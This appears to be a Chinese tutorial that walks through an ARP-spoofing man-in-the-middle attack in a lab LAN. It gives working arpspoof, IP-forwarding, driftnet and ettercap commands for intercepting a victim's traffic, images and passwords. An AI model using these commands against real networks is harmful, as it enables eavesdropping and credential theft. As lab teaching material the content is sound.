大家好,欢迎来到IT知识分享网。
arpspoof 是一款进行arp欺骗的工具,攻击者通过毒化受害者arp缓存,将网关mac替换为攻击者mac,然后攻击者可截获受害者发送和收到的数据包,可获取受害者账户、密码等相关敏感信息。
本次测试是在局域网内进行 ,利用kali截获centos相关数据
攻击者ip:192.168.157.129
受害者ip:192.168.157.250
1、在kali中开启端口转发功能:
echo 1 >/proc/sys/net/ipv4/ip_forward
关闭端口转发:echo 0 >/proc/sys/net/ipv4/ip_forward
查看端口转发是否成功:cat /proc/sys/net/ipv4/ip_forward 如果显示1则表示开启成功,显示0则开启失败
开启IP转发后 流量会经过kali的主机而后再去到目标所以这时开启arpspoof 那么目标就不会断网,因为流量通过了kali主机那么我们就可以拦截相关数据。
2、开启arpspoof
root@kali:~# arpspoof -t 192.168.157.250 192.168.157.1 -i eth0
3
3、此时kali可拦截相关受害者主机相关信息,开启wireshark拦截受害者ping数据
4、利用driftnet 窃取受害者网络中传输的图片,图片以小窗口的形式显示
5、ettercap -Tq -i eth0进行账号密码嗅探,但是此处测试了下并没有抓到相关账户密码信息。
免责声明:本站所有文章内容,图片,视频等均是来源于用户投稿和互联网及文摘转载整编而成,不代表本站观点,不承担相关法律责任。其著作权各归其原作者或其出版社所有。如发现本站有涉嫌抄袭侵权/违法违规的内容,侵犯到您的权益,请在线联系站长,一经查实,本站将立刻删除。 本文来自网络,若有侵权,请联系删除,如若转载,请注明出处:https://yundeesoft.com/33032.html